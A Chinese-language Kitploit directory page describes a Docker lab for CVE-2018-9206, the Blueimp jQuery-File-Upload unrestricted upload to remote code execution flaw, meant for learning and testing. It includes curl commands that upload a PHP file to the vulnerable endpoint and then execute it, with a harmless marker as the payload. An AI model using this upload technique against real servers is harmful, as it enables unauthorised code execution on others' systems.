Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-9206-jquery-file-upload — 基于Docker的CVE-2018-9206(Blueimp jQuery-File-Upload 不受限制的文件上传到远程代码执行)实验环境,包含PoC脚本和验证命令。 | Kitploit
工具/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

基于Docker的CVE-2018-9206(Blueimp jQuery-File-Upload 不受限制的文件上传到远程代码执行)实验环境,包含PoC脚本和验证命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
118个月前尚未审核
分享

CVE-2018-9206 - Blueimp jQuery-File-Upload 实验环境

CVE-2018-9206 的脆弱 Docker 环境 — Blueimp jQuery-File-Upload <= 9.22.0 中的无限制文件上传漏洞。

快速开始

root@kitploit:~
docker compose up -d --build

应用地址:http://localhost:8888/jQuery-File-Upload/

验证

root@kitploit:~
# 上传一个 PHP 文件
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# 执行它
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# 输出:CVE-2018-9206-PWNED

或运行 PoC 脚本:

root@kitploit:~
./scripts/poc.sh

清理

root@kitploit:~
docker compose down -v

详情

字段值
CVECVE-2018-9206
产品Blueimp jQuery-File-Upload
版本9.22.0
类型无限制文件上传 → 远程代码执行
CVSS

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
下载工具
9.8(严重)